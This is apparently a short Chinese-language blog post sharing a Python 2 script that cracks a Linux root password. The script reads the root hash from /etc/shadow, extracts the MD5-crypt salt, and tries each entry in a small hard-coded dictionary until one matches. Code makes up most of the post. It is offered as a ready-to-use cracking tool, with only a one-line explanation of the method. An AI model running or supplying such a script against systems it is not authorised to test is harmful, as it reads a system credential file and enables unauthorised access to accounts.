Linux系列的很多操作系统是采用MD5加密用户密码的,加密的过程是单向的,所以要破解只能采用暴力破解法。
下面分享个程序来破解root用户密码。
程序会遍历字典文件中的每个密码,加密后和/etc/shadow中的密码匹配,如果相同则返回成功。
#!/usr/bin/env python
import crypt
import sys
import re
dic = [
'cookie',
'test',
'fuckyou'
]
passwordfile = '/etc/shadow'
def getrootpass():
f = open(passwordfile, 'r')
for line in f.readlines():
if 'root:' in line :
rootpass = line.split(":")[1]
if rootpass is None:
print "cannot find root user"
sys.exit(1)
return rootpass
def getsalt():
rootpass = getrootpass()
if rootpass:
salt = re.match("(\$1\$.*\$)", rootpass)
if salt != None :
salt = salt.groups(1)[0]
return salt
def crack():
for passwd in dic:
testpass = crypt.crypt(passwd, str(getsalt()))
if testpass == getrootpass():
print "crack root password successful !\n root password is :\n%s" % passwd
sys.exit(0)
print "could not crack root password"
crack()